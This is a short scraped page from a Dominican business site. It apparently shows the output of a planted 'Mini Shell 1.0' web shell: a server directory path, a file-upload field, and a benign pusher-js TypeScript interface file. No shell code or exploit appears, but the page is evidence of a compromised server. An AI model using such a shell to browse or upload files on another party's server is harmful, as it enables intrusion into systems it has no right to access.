HOME


Mini Shell 1.0
Negocios La Pieza.DO | Registrate o Inicia Sesión

Inicie Sesión en su Cuenta de Negocios

Olvidó Contraseña?
DIR: /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/events/
Upload File :
Current File : /var/www/negocios.lapieza.do/node_modules/pusher-js/src/core/events/callback_table.ts
import Callback from './callback';

interface CallbackTable {
  [index: string]: Callback[];
}

export default CallbackTable;